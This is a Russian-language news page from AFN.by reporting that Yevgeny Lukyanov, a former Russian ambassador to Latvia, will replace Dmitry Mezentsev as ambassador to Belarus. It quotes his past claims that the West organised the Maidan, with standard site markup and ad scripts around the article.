
<!DOCTYPE html>
<html>
<head><title>
	Посольство РФ в Беларуси возглавит эксперт по "финансированию майданов" | Беларусь Россия Внешняя политика | АФН | Белорусские новости | Республика Беларусь | Минск
</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta property="og:image" content="/images/logo.gif" /><link rel="alternate" type="application/rss+xml" title="AFN.BY - Новости Беларуси" href="/news/rss/" /><link rel="icon" href="https://afn.by/favicon.ico" type="image/x-icon" />
    <link href="/styles/cocss.css?v=2020-09-16T2305" rel="stylesheet" type="text/css" />
    <!--[if lte IE 6]>
    <link href="/styles/ie6.css" rel="stylesheet" type="text/css" />
	<![endif]-->
	
	<meta name="keywords" content="Беларусь Россия Внешняя политика Новым послом России в Минске вместо Дмитрия Мезенцева станет 69-летний Евгений Лукьянов, который 4 года работал послом РФ в Латвии." /><meta name="description" content="Новым послом России в Минске вместо Дмитрия Мезенцева станет 69-летний Евгений Лукьянов, который 4 года работал послом РФ в Латвии." /> 
	<link rel="stylesheet" type="text/css" href="/styles/cocss2.css" />
	

	<script>
	  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
	  ga('create', 'UA-261460-1', 'auto');
	  ga('send', 'pageview');
	</script>
	<script type="text/javascript">
	<!--//--><![CDATA[//><!--
	var pp_gemius_identifier = new String('chuaoc_Qf5oBaF0jf1u_J5PaDqti6EO9B3Q0cN4cczz.H7');
	var pp_gemius_hitcollector = 'gaby.hit.gemius.pl';
	//--><!]]>
	</script>
	<script type="text/javascript" src="/scripts/xgemius.js"></script>
	<script type='text/javascript'>
	(function() {
		var w = window,
		d = document,
		protocol =/https/i.test(w.location.protocol) ? 'https:' : 'http:',
		aml = typeof admixerML !== 'undefined' ? admixerML : { };
		aml.fn = aml.fn || [];
		aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/');
		aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/');
		if (!w.admixerML) {
			var lodash = document.createElement('script');
			lodash.id = 'amlScript';
			lodash.async = true;
			lodash.type = 'text/javascript';
			lodash.src = aml.cdnPath + 'scripts3/loader2.js';
			var node = d.getElementsByTagName('script')[0];
			node.parentNode.insertBefore(lodash, node);
			w.admixerML = aml;
		}
	})();
	</script>
	<script type='text/javascript'>
		admixerML.fn.push(function() {
                admixerML.defineSlot({z: '2febba63-69cc-42a7-8be2-e10bcbe63cd5', ph: 'admixer_2febba6369cc42a78be2e10bcbe63cd5_zone_16334_sect_4740_site_4170', i: 'inv-nets'});
                admixerML.defineSlot({z: 'a95e2ad3-94ac-4d52-9a1c-87227345965a', ph: 'admixer_a95e2ad394ac4d529a1c87227345965a_zone_16335_sect_4740_site_4170', i: 'inv-nets'});
                admixerML.singleRequest();
	});
	</script>
<script data-ad-client="ca-pub-5271363197717881" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!--giraffio start
<script type="text/javascript" src="//code.giraff.io/data/widget-afnby.js" async></script>
<!--giraffio end-->
<link href="/WebResource.axd?d=THc8N3S2QkNQqMfl-WTie7cxeKRizU7tc7N60RHbrcj44yBJsW2ah91bqt1hozGOVJ9Lzyy6wzJ7Z4fWBM68ZUFq0yxae3Ry3Yc6Qseymu-MWSkniP2-WFm9EjR0giB-Ss2ocLqAtGS3ptB3kqGNqw2&amp;t=633477618823728610" type="text/css" rel="stylesheet" /></head>
<script type="text/javascript">
	<!--
	var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="//www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})()
	//-->
</script>
<body>
    <!--div style="height:10px;"></div-->
    <form method="post" action="./287347?docid=287347&amp;doctype=news" id="form1">
<input type="hidden" name="C_C_SM_HiddenField" id="C_C_SM_HiddenField" value="" />
<input type="hidden" name="__VIEWSTATE_KEY" id="__VIEWSTATE_KEY" value="VIEWSTATE_107.23.218.4_637497707227299069" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="" />


<script type="text/javascript">
//<![CDATA[
var __cultureInfo = {"name":"ru-RU","numberFormat":{"CurrencyDecimalDigits":2,"CurrencyDecimalSeparator":",","IsReadOnly":true,"CurrencyGroupSizes":[3],"NumberGroupSizes":[3],"PercentGroupSizes":[3],"CurrencyGroupSeparator":" ","CurrencySymbol":"₽","NaNSymbol":"не число","CurrencyNegativePattern":8,"NumberNegativePattern":1,"PercentPositivePattern":1,"PercentNegativePattern":1,"NegativeInfinitySymbol":"-∞","NegativeSign":"-","NumberDecimalDigits":2,"NumberDecimalSeparator":",","NumberGroupSeparator":" ","CurrencyPositivePattern":3,"PositiveInfinitySymbol":"∞","PositiveSign":"+","PercentDecimalDigits":2,"PercentDecimalSeparator":",","PercentGroupSeparator":" ","PercentSymbol":"%","PerMilleSymbol":"‰","NativeDigits":["0","1","2","3","4","5","6","7","8","9"],"DigitSubstitution":1},"dateTimeFormat":{"AMDesignator":"","Calendar":{"MinSupportedDateTime":"\/Date(-62135596800000)\/","MaxSupportedDateTime":"\/Date(253402289999999)\/","AlgorithmType":1,"CalendarType":1,"Eras":[1],"TwoDigitYearMax":2029,"IsReadOnly":true},"DateSeparator":".","FirstDayOfWeek":1,"CalendarWeekRule":2,"FullDateTimePattern":"d MMMM yyyy \u0027г.\u0027 H:mm:ss","LongDatePattern":"d MMMM yyyy \u0027г.\u0027","LongTimePattern":"H:mm:ss","MonthDayPattern":"d MMMM","PMDesignator":"","RFC1123Pattern":"ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","ShortDatePattern":"dd.MM.yyyy","ShortTimePattern":"H:mm","SortableDateTimePattern":"yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","TimeSeparator":":","UniversalSortableDateTimePattern":"yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","YearMonthPattern":"MMMM yyyy","AbbreviatedDayNames":["Вс","Пн","Вт","Ср","Чт","Пт","Сб"],"ShortestDayNames":["Вс","Пн","Вт","Ср","Чт","Пт","Сб"],"DayNames":["воскресенье","понедельник","вторник","среда","четверг","пятница","суббота"],"AbbreviatedMonthNames":["янв","фев","мар","апр","май","июн","июл","авг","сен","окт","ноя","дек",""],"MonthNames":["Январь","Февраль","Март","Апрель","Май","Июнь","Июль","Август","Сентябрь","Октябрь","Ноябрь","Декабрь",""],"IsReadOnly":true,"NativeCalendarName":"григорианский календарь","AbbreviatedMonthGenitiveNames":["янв","фев","мар","апр","мая","июн","июл","авг","сен","окт","ноя","дек",""],"MonthGenitiveNames":["января","февраля","марта","апреля","мая","июня","июля","августа","сентября","октября","ноября","декабря",""]},"eras":[1,"наша эра",null,0]};//]]>
</script>

<script src="/ScriptResource.axd?d=akSou45Evp7QYCR6rCy7htnANdHwjDkxFyw36HKSo-8wMdXD9de7URVRMYA51QOIzoWdyxwX0sMjwWU2TzMx4l4Qae2TLQlFVihq1iCOjWSjxpMfsK79SS6cB6nWo__eoZfe-4JwvmEnb7dZSD-vXPY4VBsSz_iUFM1z9dz-vw41&amp;t=4f7d5f1" type="text/javascript"></script>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEdADuvVXD1oYELeveMr0vHCmYPjN2tcjBJulKnX4K17Ef9TN9YHuT4p3xTqgwallNa1EpYblj2jJ+6LEwaF74CF/BVIQ4MIKTPf2orS70NRFTKTTiwfWsP7tlKRHxnZUclB0ji5Kht4lSRWkfWxLD+WNMsP2X3x6kkSy7OICsGO26x9DgQuY3goVvgRff8PEb9HbN8SkcyglCNvYdESlsVjrAJAuol9+A3JQ9AAWTXfNH0olo8MBrxiSOUEo1ZgWYOoMfnDt/FImra5zklohAhqDyqNhhRpKFW4nDI1fYqjX6HHs7rDky7lKIH39HL/NJo1KL8XjMU0HfoKnb2tthm0s7s/S6tWV9CcZxS3B5CoUzG3ujsJNkV0FfgeV/AW9y/Uo7UEqJrDaL3E/G/ke8AyfYHafe7OSIlGsTdLjEEO4pIHswXFR84hNg39j/QGTv4Im893HyWT0Dra4KaBejZtXTbHjtREPs2+K0jo1D/p8yEEOAv9TJoTZdl02DdzDwCUw5ZluF7ASx2+SALPD2X+uQLszTR15TdUDcKiUauA+pKk132QVIvQhoEOoWwW0MU7H/8m+sw+ecYxxx0Spd3Q5Ju1F0PBHz4c+mTIG+KYzcMKyf09/2pS0Z2pqNIoRUJl+xW8A2vSPBNFXIomb/PwSeGeJkwf9e4RUMXgB466bfhbbj5uZLUI9N8MXzBqpdK9x1cKiw7HyhyEChCt+eMJVZjFWzDQmqUWCXhM1xFylNtg6Ab6761iiWfn20QEwJHOX5jmF4e3ud7CLiLkWKftwQIJI4Lvq9T4e8wc28GStwwNOrG/tCm4gHS1NXpno2+IB1ygrjAoyXgIx/D9YwJXBG5Yos1xSjJ2DiEHP49fPJjl64YpF/ukOglr7ckLqCdjF3oIGB8wGiK56tMQnkBcBfPk3Wbtpo/Shc1WXnxM2v+9qLez7IGeueuOiUM5vUa1Um7Ax6Dz+PZHwEIvn51MGTDMrEKgZx/dN2k6Fp9LKUHOkzOAm5nmWbLKHmji/7EbfVdM7IDKjgBYXqoTdjvIvTqfvJDU0xG8/8bVAyxGWCG0NMrcv7Fa4Wrl6UApMQM79kGXvJ1SzqEsiyF6uKp1uYFyg3gDuPReQOe2cUKaXvfIZCJae3L1xF6TwuzoI69glAEq3NgRUQL28WPNbpzrseObtG5yGzRt6dzVVUFoK4DLLDsvaUmBtpSnc+AwRF6hW4r7NqCxdrc5TODbT3qAnxUz7NwZpMpfJIofIy+lWxoLxAsyS970jkY+EUWapjxA7QWMARrJIYulkmQCutH0HrZ" />
		
		<div style="margin: 10px auto 20px;">
			<div id='admixer_2febba6369cc42a78be2e10bcbe63cd5_zone_16334_sect_4740_site_4170'></div>
		</div>
		<script type='text/javascript'>
		admixerML.fn.push(function() { admixerML.display('admixer_2febba6369cc42a78be2e10bcbe63cd5_zone_16334_sect_4740_site_4170'); });
		</script>
		<div id="hd">
			<div id="logo">
				<a href="../../"><img src="/images/logo.gif" alt="АФН - Белорусское информационное агенство" width="120" height="60" border="0" /></a>
			</div>
			<div class="c">
				<ul id="toolbar">
					<li class="first"><a href="../../">Главная</a>&nbsp;&nbsp;</li><li><a href="../../news">Новости</a></li><li><a href="../../finances">Финансы</a></li><li><a href="../../oil">Нефть</a></li>
				</ul>
				<ul id="additional_toolbar">
					<li><a href="/sitemap">Карта сайта</a></li>
				</ul>
				<br />
				
				<div class="info">Последнее обновление: 24.02.2021 13:11</div>
				
			</div>
			
		</div>
        	
	<div id="container">
		<div id="content">
			<div class="wrapper">
				<!--:/news/i/287347:-->
<div class="banner-placeholder">
<!-- Yandex.RTB R-A-465488-1 -->
<div id="yandex_rtb_R-A-465488-1"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-465488-1",
                renderTo: "yandex_rtb_R-A-465488-1",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>
</div>

				
	
    
<div id="d287347" class="doc">
    <div class="hd">
        
        <h1>Посольство РФ в Беларуси возглавит эксперт по "финансированию майданов"</h1>
        
	<div style="float:left;font-size:1em;margin-right: 20px;">
        <div><span><a href="../2021/02/24">24.02.2021 09:27</a></span>&nbsp;|&nbsp;<span><a href="http://afn.by" rel="nofollow" target="_blank">АФН</a></span></div>
        
        <div>Категории: <a href="../category/1,1">Беларусь</a> <a href="../category/2,38">Россия</a> <a href="../category/3,1">Внешняя политика</a></div>
	    
	</div>
	<div id="fb-root" style="margin-top:10px;"></div><script src="//connect.facebook.net/en_US/all.js#appId=177634385630657&amp;xfbml=1"></script><fb:like href="" send="true" layout="button_count" width="250" show_faces="true" font="trebuchet ms"></fb:like>
    </div>
    <div class="bd">
    <p>Новым послом России в Минске вместо Дмитрия Мезенцева станет 69-летний Евгений Лукьянов, который 4 года работал послом РФ в Латвии.</p><p>Об этом пишет газета «КоммерсантЪ» со ссылкой на собственные «информированные источники». </p><p>До Латвии Лукьянов служил заместителем секретаря Совбеза РФ и занимался международными вопросами. «У Евгения Лукьянова серьезный экономический и банковский бэкграунд, а также опыт работы в российском Совбезе… Банковский и экономический бэкграунд нового посла будет не лишним, учитывая, какое место в отношениях России и Беларуси занимают финансовые вопросы и тема кредитов», - пишет издание.</p><p>Один из его коллег по Совбезу охарактеризовал Евгения Лукьянова как «серьезного чиновника, который не боится принимать решения и брать на себя ответственность». Господин Лукьянов публично комментировал конфликтные сюжеты вроде ситуации на Украине. Он уверен, что Майдан 2013–2014 годов — дело рук Запада, пытавшегося осложнить жизнь России.</p><p>«$5 млрд были истрачены США на подготовку Майдана. Интересно, советники Обамы докладывали ему, что в результате всех этих действий Крым вернется в РФ или что рейтинг Путина после этого зашкалит за 80%? Хотели нам отомстить за сирийское химическое оружие, за иранскую ядерную программу, за господина Сноудена, может, еще за что-то, короче, хотели "подложить такого ежа под наше тело". Подложили, но сами укололись», - заявил Евгений Лукьянов «РИА Новости» в 2014 году.</p><p>В украинских событиях того времени он винил и Польшу: «Лагеря по подготовке боевиков на территории этой страны функционировали много лет. Возможно, и сейчас существуют. Но с середины 2000-х годов эта подготовка велась, это точно».</p><p>Бессменными союзниками России Евгений Лукьянов называл армию и флот. «Это жесткая имперская оценка Александра III, но другой нет», - отмечал Евгений Лукьянов. А комментируя в 2019 году антироссийские санкции Запада, он отмечал, что Россия с давлением справляется. В своих интервью и во время пресс-конференций в Риге посол Лукьянов достаточно свободно комментировал российскую внешнюю и внутреннюю политику и демонстрировал весьма глубокое знание экономики Латвии и ее экономических связей с Россией.</p><p>«Евгений Лукьянов, как и два его предшественника Михаил Бабич и Дмитрий Мезенцев, не карьерный дипломат, а, скорее, политический назначенец», - пишет КоммерсантЪ.</p><p>Нынешний посол Мезенцев станет госсекретарем Союзного государства России и Беларуси, подтверждает издание ранее распространенную РБК информацию.</p><p></p><p></p>
    </div>
    <div class="ft"></div>
</div>
    <div class="clear" style="width:99%;">
		
<div class="l">

	<div class="hd">
		Далее по теме
	</div>

			<ul class="bd">
				
			<li class="i">
				<a href="/news/i/287363">
				<span class="time">24.02 13:11</span> <span class="title">Песков: Путин и Лукашенко решили активизировать работу силовых ведомств</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/287359">
				<span class="time">24.02 12:46</span> <span class="title">Кремль: Путин и Лукашенко обсуждали восстановление экономического взаимодействия</span>
				</a>
			</li>
		
			</ul>
		
</div>

		<div class="clear"></div>
		
<div class="l">

	<div class="hd">
		Ранее по теме
	</div>

			<ul class="bd">
				
			<li class="i">
				<a href="/news/i/287343">
				<span class="time">23.02 16:44</span> <span class="title">Лукашенко не подготовился ко встрече с Путиным в Сочи</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/287254">
				<span class="time">18.02 13:39</span> <span class="title">Кремль анонсировал "продолжительные переговоры" Путина и Лукашенко 22 февраля</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/287115">
				<span class="time">11.02 13:49</span> <span class="title">Кремль: Рано говорить о темах встречи Путина и Лукашенко</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/287103">
				<span class="time">11.02 09:58</span> <span class="title">Семашко – в отставку, Рапоту поменяют на Мезенцева</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285651">
				<span class="time">20.01 19:46</span> <span class="title">Путин и Лукашенко поговорили по телефону о СГ и «короне»</span>
				</a>
			</li>
		
			</ul>
		
</div>

    </div>
	<div class="clear"></div>
<br><br>
<!--LuckyAds-->
<div data-la-block="4e3e7c89-f061-45c3-9ca4-e90e26604ad9"></div>
<!-- Composite Start 
<div id="M617914ScriptRootC973088"></div>
<script src="https://jsc.lentainform.com/a/f/afn.by.973088.js" async></script>
<!-- Composite End -->

<!--giraff-->
<!--<div id="grf_afnby_2"></div>--->
<!--<div id="M242oY8Bs7fkyrP7JVbL" data-type="2" class="blockOfO1b2l3"></div>-->

    
<div class="clear"></div>
<div id="disqus_thread"></div>
<script type="text/javascript">
    /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
    var disqus_shortname = 'afnby'; // required: replace example with your forum shortname

    // The following are highly recommended additional parameters. Remove the slashes in front to use.
    // var disqus_identifier = 'unique_dynamic_id_1234';
    // var disqus_url = 'http://example.com/permalink-to-page.html';

    var disqus_identifier = 'afnby_news_287347';

    /* * * DON'T EDIT BELOW THIS LINE * * */
    (function() {
        var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
        dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
        (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="//disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>
<noindex>
<a href="//disqus.com" class="dsq-brlink" rel="nofollow">blog comments powered by <span class="logo-disqus">Disqus</span></a>
</noindex>

<!--

<div id="comments">
    <div class="hd" style="display:none">
		<h4>Комментарии</h4>
    	
	</div>
    
</div>


-->
<!--
<span id="C_C_Co_CommentsClosedLabel" class="commentsClosed">Комментарии запрещены</span>
-->
    
    
				<div class="adv clear">
					<!--2657565487752-->
				</div>
			</div>
		</div>
		<div id="info">			
			
	<div id="C_I_Ca" class="calendar"><div class="c"><table id="C_I_PC" cellspacing="0" cellpadding="2" title="Calendar">
	<tr><td colspan="7" bgcolor="Silver"><table cellspacing="0" width="100%">
		<tr><td width="15%"><a href="javascript:__doPostBack('ctl00$ctl00$C$I$PC','V7640')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" width="70%">Январь 2021</td><td align="right" width="15%"><a href="javascript:__doPostBack('ctl00$ctl00$C$I$PC','V7702')" style="color:Black" title="Go to the next month"></a></td></tr>
	</table></td></tr><tr><th align="center" abbr="понедельник" scope="col">Пн</th><th align="center" abbr="вторник" scope="col">Вт</th><th align="center" abbr="среда" scope="col">Ср</th><th align="center" abbr="четверг" scope="col">Чт</th><th align="center" abbr="пятница" scope="col">Пт</th><th align="center" abbr="суббота" scope="col">Сб</th><th align="center" abbr="воскресенье" scope="col">Вс</th></tr><tr><td align="center" width="14%">28</td><td align="center" width="14%">29</td><td align="center" width="14%">30</td><td align="center" width="14%">31</td><td align="center" width="14%">1</td><td align="center" width="14%"><a href="/news/2021/01/02">2</a></td><td align="center" width="14%"><a href="/news/2021/01/03">3</a></td></tr><tr><td align="center" width="14%"><a href="/news/2021/01/04">4</a></td><td align="center" width="14%"><a href="/news/2021/01/05">5</a></td><td align="center" width="14%"><a href="/news/2021/01/06">6</a></td><td align="center" width="14%"><a href="/news/2021/01/07">7</a></td><td align="center" width="14%"><a href="/news/2021/01/08">8</a></td><td align="center" width="14%"><a href="/news/2021/01/09">9</a></td><td align="center" width="14%"><a href="/news/2021/01/10">10</a></td></tr><tr><td align="center" width="14%"><a href="/news/2021/01/11">11</a></td><td align="center" width="14%"><a href="/news/2021/01/12">12</a></td><td align="center" width="14%"><a href="/news/2021/01/13">13</a></td><td align="center" width="14%"><a href="/news/2021/01/14">14</a></td><td align="center" width="14%"><a href="/news/2021/01/15">15</a></td><td align="center" width="14%"><a href="/news/2021/01/16">16</a></td><td align="center" width="14%"><a href="/news/2021/01/17">17</a></td></tr><tr><td align="center" width="14%"><a href="/news/2021/01/18">18</a></td><td align="center" width="14%"><a href="/news/2021/01/19">19</a></td><td align="center" width="14%"><a href="/news/2021/01/20">20</a></td><td align="center" width="14%"><a href="/news/2021/01/21">21</a></td><td align="center" width="14%"><a href="/news/2021/01/22">22</a></td><td align="center" width="14%"><a href="/news/2021/01/23">23</a></td><td align="center" width="14%"><a href="/news/2021/01/24">24</a></td></tr><tr><td align="center" width="14%"><a href="/news/2021/01/25">25</a></td><td align="center" width="14%"><a href="/news/2021/01/26">26</a></td><td align="center" width="14%"><a href="/news/2021/01/27">27</a></td><td align="center" width="14%"><a href="/news/2021/01/28">28</a></td><td align="center" width="14%"><a href="/news/2021/01/29">29</a></td><td align="center" width="14%"><a href="/news/2021/01/30">30</a></td><td align="center" width="14%"><a href="/news/2021/01/31">31</a></td></tr><tr><td align="center" width="14%">1</td><td align="center" width="14%">2</td><td align="center" width="14%">3</td><td align="center" width="14%">4</td><td align="center" width="14%">5</td><td align="center" width="14%">6</td><td align="center" width="14%">7</td></tr>
</table></div><div class="c"><table id="C_I_C" cellspacing="0" cellpadding="2" title="Calendar">
	<tr><td colspan="7" bgcolor="Silver"><table cellspacing="0" width="100%">
		<tr><td width="15%"><a href="javascript:__doPostBack('ctl00$ctl00$C$I$C','V7671')" style="color:Black" title="Go to the previous month"></a></td><td align="center" width="70%">Февраль 2021</td><td align="right" width="15%"><a href="javascript:__doPostBack('ctl00$ctl00$C$I$C','V7730')" style="color:Black" title="Go to the next month"></a></td></tr>
	</table></td></tr><tr><th align="center" abbr="понедельник" scope="col">Пн</th><th align="center" abbr="вторник" scope="col">Вт</th><th align="center" abbr="среда" scope="col">Ср</th><th align="center" abbr="четверг" scope="col">Чт</th><th align="center" abbr="пятница" scope="col">Пт</th><th align="center" abbr="суббота" scope="col">Сб</th><th align="center" abbr="воскресенье" scope="col">Вс</th></tr><tr><td align="center" width="14%">25</td><td align="center" width="14%">26</td><td align="center" width="14%">27</td><td align="center" width="14%">28</td><td align="center" width="14%">29</td><td align="center" width="14%">30</td><td align="center" width="14%">31</td></tr><tr><td align="center" width="14%"><a href="/news/2021/02/01">1</a></td><td align="center" width="14%"><a href="/news/2021/02/02">2</a></td><td align="center" width="14%"><a href="/news/2021/02/03">3</a></td><td align="center" width="14%"><a href="/news/2021/02/04">4</a></td><td align="center" width="14%"><a href="/news/2021/02/05">5</a></td><td align="center" width="14%"><a href="/news/2021/02/06">6</a></td><td align="center" width="14%"><a href="/news/2021/02/07">7</a></td></tr><tr><td align="center" width="14%"><a href="/news/2021/02/08">8</a></td><td align="center" width="14%"><a href="/news/2021/02/09">9</a></td><td align="center" width="14%"><a href="/news/2021/02/10">10</a></td><td align="center" width="14%"><a href="/news/2021/02/11">11</a></td><td align="center" width="14%"><a href="/news/2021/02/12">12</a></td><td align="center" width="14%"><a href="/news/2021/02/13">13</a></td><td align="center" width="14%"><a href="/news/2021/02/14">14</a></td></tr><tr><td align="center" width="14%"><a href="/news/2021/02/15">15</a></td><td align="center" width="14%"><a href="/news/2021/02/16">16</a></td><td align="center" width="14%"><a href="/news/2021/02/17">17</a></td><td align="center" width="14%"><a href="/news/2021/02/18">18</a></td><td align="center" width="14%"><a href="/news/2021/02/19">19</a></td><td align="center" width="14%"><a href="/news/2021/02/20">20</a></td><td align="center" width="14%"><a href="/news/2021/02/21">21</a></td></tr><tr><td align="center" width="14%"><a href="/news/2021/02/22">22</a></td><td align="center" width="14%"><a href="/news/2021/02/23">23</a></td><td align="center" bgcolor="Silver" width="14%"><font color="White"><a href="/news/2021/02/24">24</a></font></td><td class="future" align="center" width="14%">25</td><td class="future" align="center" width="14%">26</td><td class="future" align="center" width="14%">27</td><td class="future" align="center" width="14%">28</td></tr><tr><td class="future" align="center" width="14%">1</td><td class="future" align="center" width="14%">2</td><td class="future" align="center" width="14%">3</td><td class="future" align="center" width="14%">4</td><td class="future" align="center" width="14%">5</td><td class="future" align="center" width="14%">6</td><td class="future" align="center" width="14%">7</td></tr>
</table></div></div>
	<div class="clear"></div>
	
<div class="l">

	<div class="hd">
		Политика
	</div>

			<ul class="bd">
				
			<li class="i">
				<a href="/news/i/287363">
				<span class="time">24.02 13:11</span> <span class="title">Песков: Путин и Лукашенко решили активизировать работу силовых ведомств</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/287361">
				<span class="time">24.02 13:03</span> <span class="title">Александра Василевича оставили под стражей еще на 2 месяца</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/287360">
				<span class="time">24.02 12:59</span> <span class="title">Тихановская: «В Беларуси нет политики, здесь есть диктатор и подчиненные»</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/287359">
				<span class="time">24.02 12:46</span> <span class="title">Кремль: Путин и Лукашенко обсуждали восстановление экономического взаимодействия</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/287344">
				<span class="time">23.02 17:12</span> <span class="title">Макей в ООН рассказал о давлении Запада на «законное правительство» Беларуси</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/287343">
				<span class="time">23.02 16:44</span> <span class="title">Лукашенко не подготовился ко встрече с Путиным в Сочи</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/287341">
				<span class="time">23.02 15:21</span> <span class="title">Дело Виктора Бабарико застопорилось после лыжной прогулки Путина и Лукашенко в Сочи</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/287336">
				<span class="time">23.02 12:15</span> <span class="title">Фигурантам дела «Пресс-клуба» продлили срок содержания под стражей</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/287332">
				<span class="time">23.02 09:41</span> <span class="title">БФСС: IIHF отстранилась от расследования по делу Баскова</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/287329">
				<span class="time">23.02 08:53</span> <span class="title">В понедельник в Беларуси задержаны не менее 16 человек</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/287326">
				<span class="time">22.02 21:55</span> <span class="title">Боррель: ЕС рассматривает новые санкции в отношении белорусских властей</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/287324">
				<span class="time">22.02 20:11</span> <span class="title">Партия БНФ предлагает провести местные выборы летом 2021 года</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/287318">
				<span class="time">22.02 13:20</span> <span class="title">Беларусь обещает ответить на военную эскалацию со стороны Запада</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/287314">
				<span class="time">22.02 11:59</span> <span class="title">Евросоюз заметил усиление репрессий в отношении правозащитников в Беларуси</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/287309">
				<span class="time">22.02 09:43</span> <span class="title">Тихановская: ЕС должен усилить санкции против режима Лукашенко</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/287305">
				<span class="time">22.02 08:57</span> <span class="title">В Беларуси продолжаются локальные протесты и задержания мирных граждан</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/287299">
				<span class="time">21.02 08:41</span> <span class="title">Тихановская утверждает, что оппозиция в Беларуси "потеряла улицы"</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/287290">
				<span class="time">19.02 17:08</span> <span class="title">Минюст РБ лишил лицензий 4-х адвокатов </span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/287289">
				<span class="time">19.02 16:44</span> <span class="title">В Москве задержали 2-х белорусов за участие в августовских протестах</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/287288">
				<span class="time">19.02 15:29</span> <span class="title">Прокурор запросил 10 лет товарищу застреленного Геннадия Шутова</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/287287">
				<span class="time">19.02 15:25</span> <span class="title">Румас отмахивается от политических амбиций</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/287285">
				<span class="time">19.02 14:50</span> <span class="title">СК РБ не будет возбуждать уголовное дело по факту убийства Александра Тарайковского.</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/287277">
				<span class="time">19.02 11:04</span> <span class="title">Суд закрыл процесс о разглашении врачебной тайны смерти Бондаренко</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/287276">
				<span class="time">19.02 11:00</span> <span class="title">Совет ООН близок к расследованию нарушений прав человека в Беларуси</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/287274">
				<span class="time">19.02 10:31</span> <span class="title">Волонтер штаба Виктора Бабарико приговорен к 2 годам «химии»</span>
				</a>
			</li>
		
			</ul>
		
</div>

	<!--False-->

			<div class="adv clear">
<!-- Yandex.RTB R-A-465488-2 -->
<div id="yandex_rtb_R-A-465488-2"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-465488-2",
                renderTo: "yandex_rtb_R-A-465488-2",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>
<!-- sidebar start -->
<!--<div id="grf_afnby"></div>-->
<!-- sidebar end -->

</div>

		<!--	-->
</div>
		<div id="nav">
			<div>
				<br />
				<ul id="menu">
					<li><a href="../top">Главное</a></li>
					
							
							<li><a href="../politics">Политика</a></li>
						
							<li><a href="../economy">Экономика</a></li>
						
							<li><a href="../energy">Энергетика</a></li>
						
							<li><a href="../social">Общество</a></li>
						
						
				</ul>
			</div>
			
			
